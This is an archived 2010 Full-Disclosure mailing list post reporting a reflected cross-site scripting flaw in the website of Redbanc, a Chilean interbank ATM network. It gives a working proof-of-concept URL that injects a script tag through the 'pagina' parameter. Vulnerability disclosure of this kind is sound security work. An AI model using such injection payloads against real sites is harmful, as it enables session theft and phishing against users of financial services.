[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] XSS vulnerability in RedBanc.cl (interbank
From:       "Zerial." <fernando () zerial ! org>
Date:       2010-02-25 14:29:39
Message-ID: 4B868953.1070400 () zerial ! org
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Redbanc is an interbank network[0] in Chile connecting the ATMs of 21 banks.

Site: http://www.redbanc.cl
XSS:
http://www.redbanc.cl/portal_redbanc/browse?pagina=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

PoC and more information (spanish):
http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/


[0] http://en.wikipedia.org/wiki/Interbank_network

- -- 
Fernando A. Lagos Berardi - Zerial
Desarrollador y Programador Web
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Skype: erzerial
Jabber: zerial@jabberes.org
GTalk: fernando@zerial.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkuGiVMACgkQIP17Kywx9JSK4QCeJXD9NFlbEfD07/UshS8me7VI
WHEAni/nC+KM5X7b5ueKfxhBrTd7F/LA
=uwc+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic